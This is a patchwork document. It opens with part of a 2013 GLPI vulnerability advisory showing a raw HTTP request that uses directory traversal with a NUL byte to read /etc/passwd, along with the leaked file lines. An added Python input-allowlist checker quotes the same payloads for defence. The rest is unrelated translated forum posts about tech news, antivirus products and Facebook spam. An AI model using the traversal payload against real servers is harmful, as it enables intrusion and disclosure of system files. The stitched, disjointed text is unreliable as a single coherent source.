           Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3

Vulnerabilities discovered by Humberto Cabrera
@dniz0r
Zero Science Lab - http://www.zeroscience.mk

Advisory ID: ZSL-2013-5145
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php

09.05.2013

---

POST /glpi/ajax/common.tabs.php?_dc=1371234969991 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/glpi/front/user.form.php?id=2
Content-Length: 75
Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

target=/glpi/front/user.form.php&itemtype=../../../../../../../../../../../../../../../../etc/passwd%00User&glpi_tab=Profile_User$1&id=2

---

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
..
..
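Added example, not part of the advisory or of GLPI's code: a strict per-parameter shape check in Python, of the kind a request filter in front of the application could apply to the form bodies quoted above. The rule for each parameter (class name, glpi_-prefixed table, decimal id) is an assumption about what legitimate values look like.

```python
import re
from urllib.parse import parse_qsl

# Assumed legitimate shapes (illustrative, not taken from GLPI's code).
RULES = {
    "itemtype": re.compile(r"[A-Za-z_][A-Za-z0-9_]*"),  # bare PHP class name
    "table": re.compile(r"glpi_[a-z0-9_]+"),            # glpi_-prefixed table
    "users_id_assign": re.compile(r"[0-9]+"),           # numeric identifiers
    "id": re.compile(r"[0-9]+"),
    "value": re.compile(r"[0-9]+"),
}

# Form bodies as quoted in the advisory text, plus one constructed benign body.
SAMPLES = {
    "advisory_sqli": "users_id_assign=2{SQL_Injection}",
    "advisory_table": "value=5&table=glpi_users{SQL Injection}"
                      "&withlink=comment_link_uID302668907",
    "advisory_lfi": "target=/glpi/front/user.form.php&itemtype="
                    "../../../../../../../../../../../../../../../../etc/passwd"
                    "%00User&glpi_tab=Profile_User$1&id=2",
    "benign (constructed)": "target=/glpi/front/user.form.php&itemtype=User"
                            "&glpi_tab=Profile_User$1&id=2",
}


def describe(value):
    """Name why a rejected value looks hostile, for the alert text."""
    reasons = []
    if "\x00" in value:
        reasons.append("NUL byte")
    if re.search(r"\.\.[/\\]", value):
        reasons.append("directory traversal")
    # Anything else that broke the rule is reported generically; the
    # allowlist, not this labelling, is what decides rejection.
    return reasons or ["unexpected characters"]


def check_body(body):
    """Return {param: [reasons]} for every parameter that breaks its rule."""
    findings = {}
    # parse_qsl percent-decodes once, so %00 arrives here as "\x00".
    for name, value in parse_qsl(body, keep_blank_values=True):
        rule = RULES.get(name)
        # fullmatch, not match with "$": "$" would accept a trailing newline.
        if rule is not None and not rule.fullmatch(value):
            findings[name] = describe(value)
    return findings


if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(label, "->", check_body(body) or "ok")
```

Because the check is an allowlist on the decoded value, a double-encoded or otherwise disguised traversal string is rejected for the same reason as the plain one: it is not a class name.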
  10. Look at the reply I got when I told someone that this vivaSMS thing is a big load of crap. Name: go to the link on YouTube, find out, and comment afterwards. No, go dig ditches, come back and tell me how much you earned ;) )
  11. A former Facebook executive, responsible for the social network's information security and also in charge of personal data protection, was hired in 2010 by the US National Security Agency (NSA), which is behind the famous PRISM spying program. The person in question is Max Kelly, and the information was provided by the New York Times, which published an article on the links between the NSA and Silicon Valley. According to the publication, the American agency frequently goes "shopping" in Silicon Valley, to invest in cutting-edge technologies and to attract to its ranks the brightest minds in data analysis, writes incomemagazine.ro. Moreover, the publication explains, the NSA is one of the biggest customers of companies specializing in data mining and Big Data, where government agencies do not hesitate to invest through an investment fund run by a former NSA director. Source: Realitatea.net
  12. When you copy a news item, you post the source too.
  13. https://rstforums.com/forum/16767-hellsoft-ro.rst
  14. These last few days you have had nothing but genius ideas. Come up with something productive, for fuck's sake.
  15. I have an idea. https://rstforums.com/forum/70964-postarile-de-la-cos-n-au-ce-cauta-pe-homepage.rst Or you can post on filelist in the Lifestyles and Stupid Questions section / TPU. RST = A SECURITY FORUM, FOR FUCK'S SAKE, NOT ONE FOR ROMANTIC DATES!
  16. My opinion.
  17. This is the first time Microsoft has announced a "bounty hunt", a method that Google and Facebook have used in the past. The bug hunt has begun for users of the Windows operating system who want to install the Windows 8.1 Preview version, which will be available starting June 26. Microsoft has not organized such actions until now. They are, however, a fairly common practice in the industry, writes theverge. Microsoft is offering up to 100 thousand dollars both for major problems discovered by users and for "critical vulnerabilities" in Internet Explorer 11 Preview and ideas on methods by which the company can protect itself from possible attacks. Such rewards offered by Microsoft increase the quality of the software produced by the company and make it more secure in the event of cyber attacks. Large companies prefer to pay security specialists and hackers not only to have more secure software, but also to prevent the problems they discover from being sold on the black market. Source: Yoda.Ro
  18. Fujitsu hmm.. 1 GB Ram , camera 13 Megapixel , sounds good .. but Android SUCKS !!!!!!!!!!!!!!!
  19. You can be sure the USA is far ahead of China. You can be sure that both China and America have supercomputers much more powerful than these official ones. Everything that appears in the press appears because that is what they want us to know; it is just for show. The Americans have reached the point of having "human farms", never mind some supercomputers.
  20. Tianhe-2, the newest Chinese supercomputer, is twice as fast as Titan, its American competitor. Tianhe-2 (Milky Way 2), the supercomputer built by China's National University of Defence Technology, can perform 33,860 trillion calculations per second. An ordinary computer can perform 100 million calculations per second, which means Tianhe-2 is faster than 338 million ordinary computers put together. According to specialists, the 33,860 trillion calculations per second would translate, in cybernetic terms, into 33.86 petaflop/second, almost double the figure for the most powerful American supercomputer. Titan, owned by the US Department of Energy, manages only 17.59 petaflop/second. The Chinese did not expect Tianhe-2 to be operational until 2015; it is to enter service as soon as possible at the National Supercomputer Centre in Guangzhou, in the service of research and education. Here is the ranking of the most powerful supercomputers in the world: 1. Tianhe-2 - China 2. Titan - United States 3. Sequoia - United States 4. K computer - Japan 5. Mira - United States 6. Stampede - United States 7. Juqueen - Germany 8. Vulcan - United States 9. SuperMuc - Germany 10. Tianhe-1A - China Source: Yoda.Ro
  21. Companies rely more and more on information in electronic form. Technological evolution brings with it a series of opportunities. One of the biggest advantages of the "information technology era" is the elimination, to a greater or lesser extent, of the need for and the constraints of the "traditional" workflow, based on "concrete", physical documents, artifacts and components. Eliminating these constraints implies the "transition" from physical form to digital, electronic form. With this transition, this paradigm shift, the emphasis also moves away from the "traditional aspects". The focus therefore falls more and more on the digital form and on the ways of building and implementing solutions that depend on and work with information in this form. Adapting to the "IT era" As the balance of data tilts more and more in the digital direction, the need for solutions becomes evident. Like any other field, IT has advantages and disadvantages. In the field under discussion, some of the more "problematic" aspects are data safety and integrity and the security of information systems. Appropriate attention must therefore be paid not only to the improvements, process efficiencies and advantages brought by new technologies, but also to the "consequences". For example, implementing a data backup and recovery solution can help avoid difficult situations by providing a safe means of persisting data. Failing to implement it correctly can lead to loss of information or to storing it in an inconsistent form. Symantec – quality backup and recovery solutions A range of Symantec solutions is dedicated to data backup and recovery. The company's solutions (not only in the area of data backup and recovery) are known for their high level of quality. Symantec therefore offers software such as Backup Exec, a solution dedicated to data backup and recovery, NetBackup, a high-performance and secure solution, compatible with a wide range of operating systems and hardware configurations and extremely easy to integrate, Storage Foundation, a dedicated solution that provides a centralized system for working with storage, and many others. BrainConcert courses and safe backup methods BrainConcert offers companies and those interested in implementing Symantec solutions an easy way to become familiar with the company's technologies in this field. These courses are aimed at system administrators, specialists and members of IT teams in charge of data backup and recovery. Given the sensitive nature of the field – data backup and recovery being an extremely important process that must be carried out correctly to ensure data integrity – the BrainConcert courses cover the aspects that can prove problematic, offering an approach that is both technical and practical. In addition to these courses, BrainConcert offers free analysis and consulting to establish the company's training needs. For more details, see the BrainConcert training offer for companies. About Brain Concert BrainConcert organizes professional IT training courses both at its own premises and on the premises of contracting companies. With an interactive platform designed exclusively for course participants, efficient and personalized, which combines theoretical study with practical application to create the ideal professional training package. Source: press releases
  22. Hewlett-Packard and Samsung Electronics will now make sure that their PCs in China are installed with licensed Windows and Office software, as part of new agreements signed with Microsoft to combat piracy. Microsoft announced on Wednesday the agreements concluded with the two companies, as part of its most recent anti-piracy campaign, carried out in the Chinese city of Nanjing. Since December, Microsoft's "Keep it Real" campaign has been educating the Chinese public about the security risks posed by unlicensed Windows software. In addition, the company has warned dozens of PC distributors in China to stop trading pirated copies of its software products. The agreements announced by Microsoft require the two companies, in turn, to ask their direct partners to promote genuine Microsoft software. In March, Microsoft signed a similar agreement with Lenovo, the largest Chinese PC maker. At the time, Microsoft said the agreement would help limit and prevent the installation of pirated versions of Windows on PCs. Much of the bootleg software that ends up on PCs results from manufacturers installing a free non-Windows operating system before the devices are shipped, explained Nick Psyhogeos, vice president of the Microsoft OEM solutions group. To keep costs low, distributors will at some point install an unlicensed version of Windows on the PCs before they are put on sale. Microsoft has been fighting piracy in China for years. In 2011, China was the second country, after the US, with the highest commercial value of software piracy, estimated at 8.9 billion dollars, according to a Business Software Alliance study. China is now the largest PC market in the world, and the value of software piracy in this country is expected to soon exceed the value in the US. Microsoft recently studied 221 PCs bought in China that had unlicensed versions of Windows installed. The company found that these PCs often contain security threats. Of the 221 PCs, 54% contained malware, while the firewalls of 56% of them were faulty. Source: Computerworld - IT news, features, blogs, tech reviews, career advice
  23. We recently presented to you the new free security product 360 Internet Security 2013. It uses the BitDefender engine, alongside 2 other "in the cloud" scanning engines. It is made by Qihu, China, and looks like a promising product. A first remark: the name Internet Security is not the most fortunate, as the product offers antivirus and nothing more. After installation, which goes quickly, you meet the graphical interface: simple and easy to understand. It has low resource consumption, at most 20-30 MB of RAM, across its two processes: 360Tray.exe and 360sd.exe. It offers advanced functions for real-time antivirus monitoring, web scanning, USB protection, an anti-keylogger function and webcam protection, along with behavioral detection (Proactive Defense). The product is configurable and even offers the option of choosing what to do when a virus is detected during real-time scanning (a function missing from BitDefender products). The protection offered is top-notch, and on a set of 20 infected websites accessed in Google Chrome it successfully blocked 19. In this process we saw at work both the BitDefender engine and the heuristic engines, as well as the behavioral shield, which detected potentially dangerous activity from one of the viruses missed by signatures. As for detection on a larger set of viruses from June of this year, this security solution detected 5301 of 6200 malware samples. The 360 Internet Security 2013 product left us with a positive impression in this evaluation and we recommend it for protecting your system against viruses. You can download it using the following links: 360 Internet Security 2013 v4.1.0.4031 (32-bit) – 360 Internet Security 2013 (32-bit) - CNET Download.com 360 Internet Security 2013 v4.1.0.4031 (64-bit) – 360 Internet Security 2013 (64-bit) - CNET Download.com Source: FaraVirusi.Com
  24. Employee negligence is a serious threat to the safety of companies' confidential information, say more than half of the respondents to the Worldwide Security Products study, in which IDC interviewed several corporations globally during February 2013. Companies have identified this issue as a priority in 2013 and intend to develop and implement regulations to ensure that employees take a responsible attitude towards confidential data. "It is essential that all employees, regardless of their status in the company, understand how their wrongful actions (innocent or unintentional) can affect the organization," said Kevin Bailey, Research Director, EMEA Software Security Products and Services Policies at IDC. "Organizations will need secure and easy-to-understand policies that control the access, movement and transmission of data safely," Bailey added. In general, compliance with security policies for confidential information is ensured in companies by the legal department and by the security services, which must jointly develop, implement and monitor compliance with these rules. However, even when a company sets the right policies, there is always the risk of losing information because of human error – employee negligence or lack of information. This is indirectly confirmed by other data collected in the same IDC study: besides recognizing the need to implement security policies, approximately 36% of companies say they are very worried about the growing number of mobile clients and uncontrolled devices, such as smartphones, tablets and laptops. Preventing leaks of confidential information is a concern for 41% of the companies interviewed. Although there are numerous solutions and technologies on the market designed to protect information, the Kaspersky Endpoint Security for Business platform, which manages the coordinated protection of the company's infrastructure against malware files, ensures optimal security for sensitive information and effectively prevents information leaks. Secrets stay secret with the help of information protection technologies from Kaspersky Lab Company policies for protecting sensitive information are most often violated when employees use their own mobile devices for work activities. These devices often become a vehicle through which confidential information leaves the company without permission. Portable devices can also introduce malicious programs into its system which, after entering the company's network, can lead to information leaks or have other, even more serious consequences. Kaspersky Endpoint Security for Business integrates several advanced technologies designed to protect the company's information. First of all, it provides two levels of file encryption – File/Folder Level Encryption and Full Disk Encryption. Using the Kaspersky Security Center administration console, the network administrator can set rules for encrypting certain types of files according to industry standards, so that the information cannot be read outside the company's IT infrastructure. Sensitive information cannot be viewed, regardless of whether the person violating the company's security policy is someone inside the firm or whether the information was taken outside the company accidentally. Portable devices owned by employees can introduce malware files into the company's network, which can then allow cybercriminals to gain remote access in order to steal confidential data. Kaspersky Lab tools reduce the risk of such scenarios becoming reality. These include technologies such as Automatic Exploit Prevention, Anti-rootkit and Dynamic Whitelisting, which effectively combat even unknown threats. A lost smartphone does not mean lost data The ever-growing trend of using personal mobile devices for work activities conflicts with the principles of protecting sensitive information. These devices are not only more prone to spyware infections, but are involved every year in incidents involving leaks of confidential information, following the loss of smartphones or tablets containing companies' confidential data. Available as a standalone product or as part of the Kaspersky Endpoint Security for Business solution, Kaspersky Security for Mobile includes an extensive list of functions that allow employees' personal devices to be integrated quickly and easily into the company's IT infrastructure. In particular, the solution provides the ability to encrypt sensitive information and to wipe it remotely from the device, even if the stolen smartphone is used with a new SIM card. No matter how strict a company's security policies on sensitive information are, there is always the possibility that they will be violated because of employees' actions. Kaspersky Endpoint Security for Business has the technologies needed to neutralize or minimize the negative consequences of such incidents. Source: FaraVirusi.Com
  25. Just like the craze for finding out who visits your profile, we are facing another wave of spam. It is a new trick on Facebook, and it spreads in the form of messages that appeal to the public. Anyone would like to have more "Likes" for their personal page or more "Subscribers" to their own feed. The message propagated on the victim's wall, and also in the groups they frequent, is: Wanna Get Free Friends Requests / subscribers ? Follow steps on video =>http://www.youtube.com/watch?v=CT6jDrsKm9Y Opening that clip on YouTube, you get the following description: Link : Fast add system , Please Don’t use this system more than 1 time per hour Enjoy Clicking through, you arrive at the Fast add system page, with the message: “Does it work for you? you like it still works and get new members with us, please (like + positive COMMENT) on the video Here“. By following the instructions, all you do is grant the attackers access to your Facebook profile, and they will insistently post the messages above, propagating this spam. Of course nobody will give you extra Likes, nor will you have more subscribers. To get rid of this spam, change the password of your Facebook account. Source: FaraVirusi.Com